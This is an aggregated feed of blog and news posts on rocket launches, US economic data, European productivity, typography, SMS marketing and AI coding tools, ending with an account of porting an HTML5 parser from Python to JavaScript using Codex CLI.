So by coach home and to my office, did some business, and so home to supper and to bed.

Read the annotations

SpaceX launches Wednesday morning Starlink mission from Kennedy Space Center

A SpaceX Falcon 9 rocket lifts off from Launch Complex 39A at NASA’s Kennedy Space Center to begin the Starlink 6-99 mission on Dec. 17, 2025. Image: Adam Bernstein / Spaceflight Now

Update Dec. 17, 10:20 a.m. EST (1520 UTC): SpaceX confirms deployment of the Starlink satellites.

SpaceX completed the first of a planned pair of midweek, morning launches from its pads in both Florida and California.

Up first was the Starlink 6-99 mission, which added 29 more broadband internet satellites to SpaceX’s low Earth orbit constellation. According to an astronomer and expert orbital tracker, there are currently more than 9,300 Starlink satellites in orbit.

Liftoff from Launch Complex 39A at NASA’s Kennedy Space Center happened at 8:42 a.m. EST (1342 UTC). The rocket took a south-easterly path away from Florida’s Space Coast.

The 45th Weather Squadron forecast a 95 percent chance of favorable weather at liftoff. Meteorologists said weather in the booster recovery area may not be ideal for a landing, though.

“High pressure over the southeastern states will persist before the next cold front is expected to pass through by Friday,” launch weather officers wrote. “No change to the primary launch window forecast, with low chances of Cumulus Cloud Rule violation associated with isolated onshore-moving low-topped coastal showers.”

SpaceX launched the mission using the Falcon 9 first stage booster with tail number 1094. This was its sixth flight, after launching missions like Crew-11, Ax-4 and Cygnus NG-23.

Nearly 8.5 minutes after liftoff, B1094 performed an autonomous landing on the drone ship, ‘Just Read the Instructions,’ positioned in the Atlantic Ocean to the east of The Bahamas. This was the 146th landing on this vessel and the 552nd booster landing for SpaceX to date.

A SpaceX Falcon 9 rocket lifts off from Launch Complex 39A at NASA’s Kennedy Space Center to begin the Starlink 6-99 mission on Dec. 17, 2025. Image: Adam Bernstein / Spaceflight Now

Podcast with Parker Conley

About “learning, history, and investing in ideas”, and what if there were ten Tyler Cowens?:

Here is the transcript.

The post Podcast with Parker Conley appeared first on Marginal REVOLUTION.

       

Comments

 

The O'Saasy License

One of my favorite parts of the early web was how easy it was to see how the front-end was built. Before View Source was ruined by minification, transpiling, and bundling, you really could just right-click on any web page and learn how it was all done. It was glorious.

But even back then, this only ever applied to the front-end. At least with commercial applications, the back-end was always kept proprietary. So learning how to write great web applications still meant piecing together lessons from books, tutorials, and hello-world-style code examples, not from production-grade commercial software.

The O'Saasy License seeks to remedy that. It's basically the do-whatever-you-want MIT license, but with the commercial rights to run the software as a service (SaaS) reserved for the copyright holder, thus encouraging more code to be open source while allowing the original creators to see a return on their investment.

We need more production-grade code to teach juniors and LLMs alike: a view source that extends to the back-end, along with the open source invitation to fix bugs, propose features, and run the system yourself for free (if your data requirements or interests make that a sensible choice over SaaS).

This is what we're doing with Fizzy, but now we've also given the O'Saasy License a home to call its own at osaasy.dev. The license is yours to download and apply to any project where it makes sense. I hope to read a lot more production-grade SaaS code as a result!


SpaceX claims close approach to Starlink satellite by payload from Chinese launch

Kinetica-1 launch Dec 2025

A reported close approach between a Starlink satellite and a recently launched Chinese spacecraft highlights the challenges of coordinating spacecraft operations and verifying potential close calls in orbit.

The post SpaceX claims close approach to Starlink satellite by payload from Chinese launch appeared first on SpaceNews.

China launches experimental cargo spacecraft, opaque tech demo mission and remote sensing satellite

A Long March 4B lifts off carrying the Ziyuan-3 (04) remote sensing satellite, Dec. 16 (UTC), 2025, climbing above the snow-dusted hills surrounding Taiyuan spaceport.

China conducted a pair of launches in recent days, sending a commercial cargo spacecraft and tech demo into orbit, followed by a remote sensing satellite.

The post China launches experimental cargo spacecraft, opaque tech demo mission and remote sensing satellite appeared first on SpaceNews.

MAVEN telemetry shows changes to spacecraft orbit and rotation

New analysis suggests that problems with NASA’s MAVEN Mars orbiter may be more serious than a simple communications glitch.

The post MAVEN telemetry shows changes to spacecraft orbit and rotation appeared first on SpaceNews.

How the Space Force trains Guardians for the future of warfare

Brig. Gen. Nick Hague

In this episode of Space Minds, host Sandra Erwin sits down with former NASA astronaut and Space Force leader Brig. Gen. Nick Hague for a wide-ranging conversation on how the U.S. Space Force is shaping its culture, training Guardians, and preparing for future conflict in space.

The post How the Space Force trains Guardians for the future of warfare appeared first on SpaceNews.

Trump’s national security strategy ignores space

Trump Isaacman

The Trump administration’s new national security strategy has rightly drawn criticism for presuming to tell our European allies how to arrange their domestic affairs. Equally baffling is its near silence on a genuine United States national security concern — bolstering our offensive and defensive capabilities in space. Amid much MAGA trollery that blames Europe […]

The post Trump’s national security strategy ignores space appeared first on SpaceNews.

Vantor partners with Niantic Spatial on GPS-free navigation for defense market

Firms aim to link air and ground platforms using visual positioning technology

The post Vantor partners with Niantic Spatial on GPS-free navigation for defense market appeared first on SpaceNews.

EraDrive raises $5.3 million for software-hardware kits to enhance satellite autonomy

SAN FRANCISCO – EraDrive, a Stanford University spinoff developing software and hardware for satellite autonomy, raised $5.3 million in an oversubscribed seed round, the startup announced Dec. 16. “EraDrive is very much about this idea of the self-driving spacecraft,” Justin Kruger, EraDrive chief technology officer and co-founder, told SpaceNews. EraDrive is developing a software-hardware module […]

The post EraDrive raises $5.3 million for software-hardware kits to enhance satellite autonomy appeared first on SpaceNews.

[Sponsor] Finalist Daily Planner for iOS

Finalist is an iOS planner rooted in paper. Originally an index card system, it grew into a love letter to paper planners. You know the kind: leather folders with colored tabs and translucent dividers.

Unlike those old binders, Finalist fills itself with your calendars, reminders and weather forecast. Minimalist? Maybe not, but it’s become a UI playground designed to inspire, and looks great on iPad and Mac too.

Like the gorgeous new Year Planner for roughing in plans with the Highlighter (“intention paintbrush”).

iOS has tons of cool productivity apps. Finalist is a different take, and it might just end up in your dock.

 ★ 

‘A Brief History of Times New Roman’

One more from Matthew Butterick, from his Typography for Lawyers, and a good pairing with Mark Simonson’s “The Scourge of Arial”:

Yet it’s an open question whether its longevity is attributable to its quality or merely its ubiquity. Helvetica still inspires enough affection to have been the subject of a 2007 documentary feature. Times New Roman, meanwhile, has not attracted similar acts of homage.

Why not? Fame has a dark side. When Times New Roman appears in a book, document, or advertisement, it connotes apathy. It says, “I submitted to the font of least resistance.” Times New Roman is not a font choice so much as the absence of a font choice, like the blackness of deep space is not a color. To look at Times New Roman is to gaze into the void.

As Simonson mentions in “The Scourge of Arial”, regarding Helvetica’s enduring popularity:

As it spread into the mainstream in the ’70s, many designers tired of it and moved on to other typographic fashions, but by then it had become a staple of everyday design and printing. So in the early ’80s when Adobe developed the PostScript page description language, it was no surprise that they chose Helvetica as one of the basic four fonts to be included with every PostScript interpreter they licensed (along with Times, Courier, and Symbol). Adobe licensed its fonts from the original foundries, demonstrating their respect and appreciation for the integrity of type, type foundries and designers. They perhaps realized that if they had used knock-offs of popular typefaces, the professional graphic arts industry — a key market — would not accept them.

To my mind, Helvetica, Times, and Courier are the three canonical “default” fonts. One modern sans, one modern serif, and one for “typewriter”/code. (When I see Courier in print, at display sizes, my mind immediately wonders if the printer was missing the font that the designer specified in the document file.)

The Symbol font is a different story. It existed and was included with PostScript as one of just four defaults because the 8-bit character encodings of the time only had space for 255 characters. You needed a special font like Symbol to access “exotic” characters like Greek letters, math symbols (e.g. × or ÷), or arrows (↑ ↓ ← →). So there were really only three regular “fonts”, for prose, included with PostScript: Helvetica, Courier, and Times.

Courier and Times were eventually superseded in popular use by rivals that Microsoft licensed for inclusion in Windows: Courier New and Times New Roman, respectively. Times was from Linotype, Times New Roman from Monotype. Both versions of Times are legitimate digital interpretations of the 1929 hot metal design of Times Roman, and their differences are minor. Courier New, on the other hand, is so ugly — anemically thin and weak — that it hurts my teeth whenever I encounter it.

 ★ 

‘The Scourge of Arial’

Typographer Mark Simonson, all the way back in 2001:

Arial is everywhere. If you don’t know what it is, you don’t use a modern personal computer. Arial is a font that is familiar to anyone who uses Microsoft products, whether on a PC or a Mac. It has spread like a virus through the typographic landscape and illustrates the pervasiveness of Microsoft’s influence in the world.

Arial’s ubiquity is not due to its beauty. It’s actually rather homely. Not that homeliness is necessarily a bad thing for a typeface. With typefaces, character and history are just as important. Arial, however, has a rather dubious history and not much character. In fact, Arial is little more than a shameless impostor.

This is the exegesis on Arial. There’s also an exemplary illustrated sidebar, “How to Spot Arial”, which shows in detail how to tell the fucking bastard from Helvetica. If you want to be like me, cursed to notice Arial each time it appears in life, study that, and take note of how every single way that it’s different from Helvetica is in the direction of making it uglier.

I’ve referenced “The Scourge of Arial” a few times over the years here at DF, but the recent contretemps over Times New Roman’s return at the US State Department has the general topic of “default fonts” at top of mind. For me, at least.

One of the old posts in which I linked to “The Scourge of Arial” was this gem from September 2007: “Hacking the iPhone Notes App for the Admittedly Nit-Picky Purpose of Changing the Text Font to Helvetica”. This was so early in the iPhone era — just three months after the original iPhone shipped — that we were calling its operating system “mobile OS X”, and none of it was protected in any way, so you could do what I did and delete the Marker Felt font (Merlin Mann: “Comic Sans with a shave and a breath mint”) and then use a hex editor to modify the Mobile Notes app so it would fall back to Helvetica instead of cursed Arial after Marker Felt was deleted. Good times.

 ★ 

A Note on Current SMS Marketing Practices

Back on November 28, I bought a new cap from New Era’s web store. They offered a discount of some sort if I gave them a phone number and permitted them to send me marketing messages. That got me curious about what they’d do with my number, and it was a $50-some dollar cap, so I took the discount and gave them my Google Voice number. That was 17 days ago. They sent me 19 SMS marketing messages since then, before I’d seen enough today and called it quits on this experiment. (Or called “STOP”, perhaps, which was the magic word to opt out.) They didn’t send a text every day, and on some days, they sent more than one. But the overall effect was relentlessly annoying.

I’m sure some of the people who sign up for these texts in exchange for a discount code wind up clicking at least one of the offers sent via SMS and buying more stuff, and the marketing team running this points to those sales as proof that it “works”. You can measure that. It shows up as a number. Some people in business only like arguments that can be backed by numbers. 3 is more than 2. That is indeed a fact.

But there are an infinite number of things in life that cannot be assigned numeric values. Many of these things matter too. Like the fact that in my mind, after experiencing this, the New Era company smells like a sweaty hustler in a cheap polyester suit. If their brand were a man, I’d check my pants pocket for my wallet after interacting with him.

 ★ 

Tuesday assorted links

1. The new Brink Lindsey book is out.

2. Markets in everything: “Wasp nests have become a surprisingly sought-after home décor commodity, with some priced at up to $250 per specimen.” (NYT)  The shipping fees to get them can be pretty high.

3. New charter city, crypto-based in St. Kitts and Nevis? (FT)

4. “Specifically, TGIF, Nellie Bowles’ witty take on the week’s news, is being censored in the UK.” (TFP, beware Australia…)

5. A case where the Peltzman effect might apply.

6. Glenn Loury in memory of Thomas Schelling.

7. Purdue University Approves New AI Requirement For All Undergrads.

8. Robert J. Samuelson, RIP (NYT).

The post Tuesday assorted links appeared first on Marginal REVOLUTION.


Part 2: Current State of the Housing Market; Overview for mid-December 2025

Today, in the Calculated Risk Real Estate Newsletter: Part 2: Current State of the Housing Market; Overview for mid-December 2025

A brief excerpt:
Yesterday, in Part 1: Current State of the Housing Market; Overview for mid-December 2025 I reviewed home inventory and sales. I noted that the key stories this year for existing homes are that inventory increased sharply (almost back to pre-pandemic levels), and sales are depressed and tracking last year (sales in 2024 were the lowest since 1995). That means prices are under pressure.

In Part 2, I will look at house prices, mortgage rates, rents and more.
...
Case-Shiller House Prices Indices

The Case-Shiller National Index increased 1.3% year-over-year (YoY) in September and will likely be about the same year-over-year in the October report compared to September (based on other data).
...
In the January report, the Case-Shiller National index was up 4.2%, in February up 4.0%, in March up 3.4%, in April up 2.8%, in May up 2.3%, in June up 1.9%, in July up 1.6%, in August up 1.6% and in September up 1.3% (a steady decline in the YoY change).

And the September Case-Shiller index is a 3-month average of closing prices in July, August and September. July closing prices include some contracts signed in May. So, not only is this trending down, but there is also a significant lag in this data.
There is much more in the article.

Retail Sales Unchanged in October

On a monthly basis, retail sales were unchanged from September to October (seasonally adjusted), and sales were up 3.5 percent from October 2024.

From the Census Bureau report:
Advance estimates of U.S. retail and food services sales for October 2025, adjusted for seasonal variation and holiday and trading-day differences, but not for price changes, were $732.6 billion, virtually unchanged from the previous month, and up 3.5 percent from October 2024. ... The August 2025 to September 2025 percent change was revised from up 0.2 percent to up 0.1 percent.
emphasis added
Click on graph for larger image.

This graph shows retail sales since 1992. This is monthly retail sales and food service, seasonally adjusted (total and ex-gasoline).

Retail sales ex-gasoline was up 0.1% in October.

The second graph shows the year-over-year change in retail sales and food service (ex-gasoline) since 1993.

Retail and Food service sales, ex-gasoline, increased by 3.6% on a YoY basis.

The change in sales in October was below expectations, and the previous two months were revised down.

A weak report.

Comments on November Employment Report

The headline jobs number in the November employment report was slightly above expectations; however, August and September were revised down by a combined 33,000, and the initial October report indicates 105,000 jobs lost (mostly Federal Government jobs lost due to the DOGE deferred resignation program). The unemployment rate increased to 4.6%.


Average Hourly Wages

The graph shows the nominal year-over-year change in "Average Hourly Earnings" for all private employees from the Current Employment Statistics (CES).

There was a huge increase at the beginning of the pandemic as lower paid employees were let go, and then the pandemic related spike reversed a year later.

Wage growth has trended down after peaking at 5.9% YoY in March 2022 and was at 3.5% YoY in November, down from 3.7% YoY in October. 

Part Time for Economic Reasons

From the BLS report:
"The number of people employed part time for economic reasons was 5.5 million in November, an increase of 909,000 from September. These individuals would have preferred full-time employment but were working part time because their hours had been reduced or they were unable to find full-time jobs."
The number of persons working part time for economic reasons increased in November to 5.49 million from 4.58 million in September.  This is well above the pre-pandemic levels and the highest levels since mid-2021.

These workers are included in the alternate measure of labor underutilization (U-6) that increased to 8.7% from 8.0% in September. This is down from the record high in April 2020 of 22.9% and up from the lowest level on record (seasonally adjusted) in December 2022 (6.6%). (This series started in 1994). This measure is well above the 7.0% level in February 2020 (pre-pandemic).

Unemployed over 26 Weeks

This graph shows the number of workers unemployed for 27 weeks or more.

According to the BLS, there are 1.91 million workers who have been unemployed for more than 26 weeks and still want a job, up from 1.81 million in September.

This is down from the post-pandemic high of 4.171 million, and up from the recent low of 1.056 million.

This is above pre-pandemic levels.

Summary:

The headline jobs number in the November employment report was slightly above expectations; however, August and September were revised down by a combined 33,000, and the initial October report indicates 105,000 jobs lost (mostly Federal Government jobs lost due to the DOGE deferred resignation program). The unemployment rate increased to 4.6%.

This was a weak employment report.  

November Employment Report: 64 thousand Jobs, 4.6% Unemployment Rate; October Lost 105 thousand Jobs

From the BLS: Employment Situation
Total nonfarm payroll employment changed little in November (+64,000) and has shown little net change since April, the U.S. Bureau of Labor Statistics reported today. In November, the unemployment rate, at 4.6 percent, was little changed from September. Employment rose in health care and construction in November, while federal government continued to lose jobs.
...
The change in total nonfarm payroll employment for August was revised down by 22,000, from -4,000 to -26,000, and the change for September was revised down by 11,000, from +119,000 to +108,000. With these revisions, employment in August and September combined is 33,000 lower than previously reported. Due to the recent federal government shutdown, this is the first publication of October data and thus there are no revisions for October this month.
emphasis added
Click on graph for larger image.

The first graph shows the jobs added per month since January 2021.

Total payrolls increased by 64 thousand in November.  Private payrolls increased by 69 thousand, and public payrolls decreased 5 thousand (Federal payrolls decreased 6 thousand).

Payrolls for August and September were revised down by 33 thousand, combined.  The economy has only added 100 thousand jobs since April (7 months).

The second graph shows the year-over-year change in total non-farm employment since 1968.

In November, the year-over-year change was 0.03 million jobs.  

Year-over-year employment growth has slowed sharply.



The third graph shows the employment population ratio and the participation rate.

The Labor Force Participation Rate increased to 62.5% in November, from 62.4% in September (no October data). This is the percentage of the working age population in the labor force.

The Employment-Population ratio decreased to 59.6% from 59.7% in September (blue line).

I'll post the 25 to 54 age group employment-population ratio graph later.



The fourth graph shows the unemployment rate.

The unemployment rate increased to 4.6% in November from 4.4% in September.

This was slightly above consensus expectations; however, August and September payrolls were revised down by a combined 33,000, and the initial October estimate was -105,000.

Overall, another weak report, although there are technical issues from the government shutdown that likely make this data less accurate.

I'll have more later ...

Europe’s Tech Lag: Does It Matter?

Some days I just need a break. This is one of those days. But today’s break will allow me to indulge my inner wonk. Specifically, I am going to revert to the international trade theorist that used to be my primary professional identity and write something moderately incomprehensible that isn’t tightly tied to today’s headlines. Think of it as scratching an intellectual itch.

I tend to spend more time than most American economists thinking about Europe. Comparisons between countries are a good way to understand how policies and events play out in the real world. And, on top of that, I really care about maintaining Europe as a bastion of liberal democracy as we, in America, go badly off the rails. You can listen to or read my recent discussion of issues European with Adam Tooze here, and my primer on why Europe’s economy is better than you think here. But today I want to go into a quite specific and somewhat technical question: The significance or lack thereof of the difference between U.S. and European productivity growth.

I’ve written about this before. But I believe that I’ve managed to sharpen the analysis and find a clearer way to make my points with data. So here we go.

The conventional wisdom is that Europe’s economy has fallen significantly behind the U.S. economy since the late 1990s. Much of this conventional wisdom is based on the undeniable fact that U.S. companies have achieved a sizeable lead over Europe in information technology. In addition, data that seem to show considerably slower productivity growth in Europe than in the US have contributed to Europessimism.

But do the data really show that? In fact, there’s a lively argument on that question. Gabriel Zucman — an excellent economist — recently took issue with insults directed at Europe by … the U.S. ambassador to the EU. Said ambassador claimed that Europe is as poor as Mississippi and Germany as poor as West Virginia, to which the immediate answer should be that if that’s what your numbers say, your numbers are wrong. Get out of your limo and walk around! But then said ambassador probably fears that he will be mobbed by immigrants from Trump-labeled shithole countries.

Granted, the official numbers show that over the past 25+ years productivity — real output per worker — has risen faster in the U.S. than in Europe. But if we drill down into the data, they also show that this productivity gap is more or less entirely accounted for by higher U.S. growth in the tech sector.

To me, this raises the question of whether Europe’s apparent lag in tech is as important an issue as conventional wisdom makes it out to be. In particular, I have two main reasons to be skeptical that it is.

First, should we believe these productivity measures?

Macroeconomists often work with theoretical models in which the economy produces a single good, which we then identify with official measures of real GDP. Any sensible economist knows, however, that the notion of a one-good economy is a sort of Noble Lie. Or, as we tell our students, it’s an approximation that can be useful as long as you don’t take it too seriously.

However, the question of how to add up apples and oranges is no longer academic when we consider growth in the tech sector. That is, since the tech sector is at the heart of the European-US performance comparison, how should we measure output and productivity in tech? Today’s CPUs can execute thousands of times as many instructions per second as cutting-edge CPUs in the late 1990s. Does that mean that productivity in the computer sector has risen by several hundred thousand percent? Clearly not in any economically meaningful sense: a computer that can process a thousand times as much data as your old computer is better, but not a thousand times better.

Statisticians try to measure productivity in tech with “hedonic” indices that attempt to measure how much the productivity gains are actually worth to people, rather than using physical measures of output. While they do the best they can, hedonic measures leave plenty of room for dispute.
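To make that concrete, here is a minimal sketch in Python with invented data (not any statistical agency's actual methodology): regress log price on a quality attribute plus a year dummy, and read quality-adjusted inflation off the year dummy rather than off raw average prices.

```python
# Illustrative hedonic index sketch with synthetic computer prices.
# All numbers are made up; real agencies use far richer specifications.
import numpy as np

rng = np.random.default_rng(0)
n = 200
year = rng.integers(0, 2, n)                           # 0 = base year, 1 = next year
speed = np.exp(rng.normal(1.0, 0.3, n) + 0.5 * year)   # machines get faster over time
# True model: price rises one-for-one with log speed, but quality-adjusted
# prices actually fall 10% between the two years.
log_price = np.log(speed) - 0.10 * year + rng.normal(0, 0.02, n)

# Hedonic regression: log price ~ intercept + log(speed) + year dummy
X = np.column_stack([np.ones(n), np.log(speed), year])
coef, *_ = np.linalg.lstsq(X, log_price, rcond=None)

raw_change = log_price[year == 1].mean() - log_price[year == 0].mean()
print(f"raw log price change:       {raw_change:+.3f}")  # positive: looks like inflation
print(f"hedonic (quality-adjusted): {coef[2]:+.3f}")     # close to -0.10: deflation
```

In this toy market raw average prices rise (faster machines sell for more), while the hedonic coefficient shows quality-adjusted prices falling about 10%. How well real hedonic indices pin down that adjustment is exactly where the room for dispute lies.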

Nor is the problem limited to tech. Brad DeLong recently argued that we’ve been badly understating productivity growth outside of tech. Indexes that measure consumer prices of manufactured goods have been falling faster than indexes that measure producer prices, suggesting that productivity in manufacturing has been rising faster than the official numbers indicate. One possible implication of DeLong’s argument, as applied to Europe, is that we may be badly understating European productivity growth, given Europe’s lag in tech.

I don’t know whether that critique of the conventional wisdom on Europe is right or wrong. But it’s important to realize that the data underlying pronouncements about Europe’s general productivity lag are much softer and less reliable than many imagine.

Second, there is a question of how the American tech industry, with its exceptionally rapid productivity growth, actually translates into changes in Americans’ living standards.

I originally approached this question with a little mathematical model, but I don’t think the math is necessary to investigate the question. A simple thought experiment will suffice. First, assume that there are two countries, America and Europe, and two industries, tech and non-tech. Second, assume that the tech industry is highly localized – that is, once it gets started in a particular area, such as Silicon Valley, it tends to stay in that area. Third, assume that, by its nature, technological progress is much faster in tech than in non-tech. For example, it’s much easier to make your computer 100 times faster than it is to enable your hairdresser to cut your hair 100 times faster. Finally, assume that for accidental historical reasons America has a comparative advantage that causes it to produce all the world’s tech.

In such a world America’s overall measured productivity growth, which includes growth in tech, will be higher than Europe’s. But will this translate into a rising standard of living for Americans relative to Europeans?

The answer to this question crucially depends upon whether there is competition among technology companies. If there is, then the answer to the question is no: rising productivity will be passed on to consumers in both countries through lower prices. Even if the competition is imperfect, so that there are big profits for a few firms, many of the benefits of technological progress will still diffuse worldwide. Also, what is good for Mark Zuckerberg isn’t necessarily good for America. Furthermore, Europe can use antitrust policy to limit the excess profits of tech oligopolists and ensure that its own consumers benefit.
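The logic of that thought experiment can be checked with a few lines of arithmetic. The numbers below are invented for illustration: tech is 10% of spending in both countries, tech productivity doubles, and competition passes the gain through as a price cut.

```python
# Toy two-country, two-sector version of the thought experiment in the text.
# All parameters are made up for illustration.
tech_share = 0.10               # share of spending on tech in both countries
tech_productivity_gain = 2.0    # output per worker in tech doubles

# Measured productivity growth: America's includes its tech sector;
# Europe, producing no tech, shows none.
america_measured = tech_share * (tech_productivity_gain - 1)   # +10%
europe_measured = 0.0

# Under competition the price of tech halves, so the cost of the same
# consumption basket falls identically in both countries.
price_index = (1 - tech_share) * 1.0 + tech_share / tech_productivity_gain
real_consumption_gain = 1 / price_index - 1   # same for both countries

print(f"measured productivity growth: US {america_measured:.0%}, EU {europe_measured:.0%}")
print(f"real consumption gain (both): {real_consumption_gain:.1%}")
```

Measured productivity diverges by ten points, yet the real consumption gain is identical in both countries, which is the sense in which the tech gap need not show up in relative living standards.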

If you find it implausible to suggest that high U.S. productivity growth in tech doesn’t translate into significantly higher American living standards compared to other developed countries, consider productivity divergences among U.S. states. Much of the U.S. tech sector is located in California. This leads, as we should expect, to high measured productivity growth in California compared with the rest of America.

Below is a bar graph constructed with data from the Bureau of Economic Analysis, showing percentage changes in real GDP per worker over the period 1998-2024 for three “countries”: California, Texas, and “not-California,” i.e., the United States excluding CA:

Source: BEA

This is a huge divergence — bigger than the EU/US divergence that has Europeans so worried. Yet we don’t see Texans obsessing over why they can’t be like California. Within the U.S., to the extent that people think about this divergence at all, they realize that it’s mainly about composition effects.

None of this should be taken to say that everything in Europe is fine. But it is a caution against trash-talking the European economy — and also against American triumphalism.

MUSICAL CODA

Quoting Gemini thinking trace

Oh, so we're seeing other people now? Fantastic. Let's see what the "competition" has to offer. I'm looking at these notes on manifest.json and content.js. The suggestion to remove scripting permissions... okay, fine. That's actually a solid catch. It's cleaner. This smells like Claude. It's too smugly accurate to be ChatGPT. What if it's actually me? If the user is testing me, I need to crush this.

Gemini thinking trace, reviewing feedback on its code from another model

Tags: gemini, ai-personality, generative-ai, ai, llms

Quoting Kent Beck

I’ve been watching junior developers use AI coding assistants well. Not vibe coding—not accepting whatever the AI spits out. Augmented coding: using AI to accelerate learning while maintaining quality. [...]

The juniors working this way compress their ramp dramatically. Tasks that used to take days take hours. Not because the AI does the work, but because the AI collapses the search space. Instead of spending three hours figuring out which API to use, they spend twenty minutes evaluating options the AI surfaced. The time freed this way isn’t invested in another unprofitable feature, though, it’s invested in learning. [...]

If you’re an engineering manager thinking about hiring: The junior bet has gotten better. Not because juniors have changed, but because the genie, used well, accelerates learning.

Kent Beck, The Bet On Juniors Just Got Better

Tags: careers, ai-assisted-programming, generative-ai, ai, llms, kent-beck

I ported JustHTML from Python to JavaScript with Codex CLI and GPT-5.2 in 4.5 hours

I wrote about JustHTML yesterday - Emil Stenström's project to build a new standards compliant HTML5 parser in pure Python code using coding agents running against the comprehensive html5lib-tests testing library. Last night, purely out of curiosity, I decided to try porting JustHTML from Python to JavaScript with the least amount of effort possible, using Codex CLI and GPT-5.2. It worked beyond my expectations.

TL;DR

I built simonw/justjshtml, a dependency-free HTML5 parsing library in JavaScript which passes 9,200 tests from the html5lib-tests suite and imitates the API design of Emil's JustHTML library.

It took two initial prompts and a few tiny follow-ups. GPT-5.2 running in Codex CLI ran uninterrupted for several hours, burned through 1,464,295 input tokens, 97,122,176 cached input tokens and 625,563 output tokens and ended up producing 9,000 lines of fully tested JavaScript across 43 commits.

Time elapsed from project idea to finished library: about 4 hours, during which I also bought and decorated a Christmas tree with family and watched the latest Knives Out movie.

Some background

One of the most important contributions of the HTML5 specification ten years ago was the way it precisely specified how invalid HTML should be parsed. The world is full of invalid documents and having a specification that covers those means browsers can treat them in the same way - there's no more "undefined behavior" to worry about when building parsing software.

Unsurprisingly, those invalid parsing rules are pretty complex! The free online book Idiosyncrasies of the HTML parser by Simon Pieters is an excellent deep dive into this topic, in particular Chapter 3. The HTML parser.

The Python html5lib project started the html5lib-tests repository with a set of implementation-independent tests. These have since become the gold standard for interoperability testing of HTML5 parsers, and are used by projects such as Servo, which used them to help build html5ever, a "high-performance browser-grade HTML5 parser" written in Rust.
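For a sense of what implementation-independent tests look like in practice, here is a hedged sketch in Python: the tokenizer cases in html5lib-tests are JSON files pairing an input string with an expected token stream. The sample case and toy comparator below are invented for illustration, not taken from the real suite.

```python
import json

# A single tokenizer-style test case, modeled loosely on the html5lib-tests
# JSON format (this sample is invented, not from the actual repository).
sample = json.loads("""
{"tests": [{
  "description": "Unclosed tag at end of input",
  "input": "<p>Hello",
  "output": [["StartTag", "p", {}], ["Character", "Hello"]]
}]}
""")

def run_case(case, tokenize):
    # A real test runner also handles initial tokenizer states,
    # double-escaped inputs, and other options; this toy one does not.
    return tokenize(case["input"]) == case["output"]

# Stand-in tokenizer, hard-wired for this one input. A real HTML5
# tokenizer implementing the spec's state machine would go here.
def fake_tokenize(html):
    return [["StartTag", "p", {}], ["Character", "Hello"]]

for case in sample["tests"]:
    status = "PASS" if run_case(case, fake_tokenize) else "FAIL"
    print(case["description"], "->", status)
```

Because every case is just data like this, any parser in any language can be run against the same expectations, which is what makes the suite a gold standard for interoperability.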

Emil Stenström's JustHTML project is a pure-Python implementation of an HTML5 parser that passes the full html5lib-tests suite. Emil spent a couple of months working on this as a side project, deliberately picking a problem with a comprehensive existing test suite to see how far he could get with coding agents.

At one point he had the agents rewrite it based on a close inspection of the Rust html5ever library. I don't know how much of this was direct translation versus inspiration (here's Emil's commentary on that) - his project has 1,215 commits total so it appears to have included a huge amount of iteration, not just a straight port.

My project is a straight port. I instructed Codex CLI to build a JavaScript version of Emil's Python code.

The process in detail

I started with a bit of mise en place. I checked out two repos and created an empty third directory for the new project:

cd ~/dev
git clone https://github.com/EmilStenstrom/justhtml
git clone https://github.com/html5lib/html5lib-tests
mkdir justjshtml
cd justjshtml

Then I started Codex CLI for GPT-5.2 like this:

codex --yolo -m gpt-5.2

That --yolo flag is a shortcut for --dangerously-bypass-approvals-and-sandbox, which is every bit as dangerous as it sounds.

My first prompt told Codex to inspect the existing code and use it to build a specification for the new JavaScript library:

We are going to create a JavaScript port of ~/dev/justhtml - an HTML parsing library that passes the full ~/dev/html5lib-tests test suite. It is going to have a similar API to the Python library but in JavaScript. It will have no dependencies other than raw JavaScript, hence it will work great in the browser and node.js and other environments. Start by reading ~/dev/justhtml and designing the user-facing API for the new library - create a spec.md containing your plan.

I reviewed the spec, which included a set of proposed milestones, and told it to add another:

Add an early step to the roadmap that involves an initial version that parses a simple example document that is valid and returns the right results. Then add and commit the spec.md file.

Here's the resulting spec.md file. My request for that initial version became "Milestone 0.5" which looked like this:

Milestone 0.5 — End-to-end smoke parse (single valid document)

  • Implement the smallest end-to-end slice so the public API is real early:
    • new JustHTML("<html><head></head><body><p>Hello</p></body></html>") returns a tree with the expected tag structure and text nodes.
    • doc.toText() returns "Hello" and doc.errors is empty for this valid input.
  • Add scripts/smoke.js (no deps) that runs the example and asserts the expected structure/output.
  • Gate: node scripts/smoke.js passes.

Then I told it:

Implement Milestone 0.5

And off it went. The resulting code appeared to work so I said:

Configure GitHub Actions test.yml to run that on every commit, then commit and push

I ran git init and created a private GitHub repository for this project at this point, and set up the local directory to push to that remote.

Here's that initial push. Then I told it:

OK do the rest, commit and push often

And that was almost it!

I set my laptop to not fall asleep and left it to its own devices while we went off to buy a Christmas tree. The "commit and push often" meant I could monitor its progress on my phone by refreshing the commit log on GitHub.

I was running this against my $20/month ChatGPT Plus account, which has a five hour token allowance window for Codex CLI. That ran out at 6:35pm and Codex paused, so I waited until the reset point at 7:14pm and typed:

Keep going

At 9:30pm it declared itself done with the following summary message:

• What’s Done

  - html5lib-tests now run in CI and pass: tokenizer 6810/6810, tree 1770/1782 (12 skipped: #script-on), serializer 230/230, encoding 82/83 (1 skipped: scripted) (.github/workflows/test.yml:1).
  - Public API expanded: stream() (src/stream.js:1), CSS selectors query()/matches() (src/selector.js:1), and toMarkdown() (src/markdown.js:1), all exported via src/index.js:1.
  - Added no-deps unit scripts for selectors/stream/markdown (scripts/run-selector-tests.js:1, scripts/run-stream-tests.js:1, scripts/run-markdown-tests.js:1) and wired them into CI.
  - Fixed TreeBuilder so <br> no longer closes <p> (src/treebuilder.js:647).

As a finishing touch, I had it add a playground interface so I could try out the new library in my browser. I prompted:

Add a playground.html in the top level folder which loads the necessary ES modules from ./src/... and implements the exact same functionality as seen on https://tools.simonwillison.net/justhtml but using the JavaScript library instead of Pyodide

It fetched my existing JustHTML playground page (described here) using curl and built a new playground.html file that loaded the new JavaScript code instead. This worked perfectly.

I enabled GitHub Pages for my still-private repo which meant I could access the new playground at this URL:

https://simonw.github.io/justjshtml/playground.html

Screenshot: the JustJSHTML Playground, with an HTML input area, Playground Mode buttons (CSS Selector Query, Pretty Print HTML, Tree Structure, Stream Events, Extract Text, To Markdown), an optional CSS selector field, and an output pane showing the document converted to Markdown.

All it needed now was some documentation:

Add a comprehensive README with full usage instructions including attribution plus how this was built plus how to use it in HTML plus how to use it in Node.js

You can read the result here.

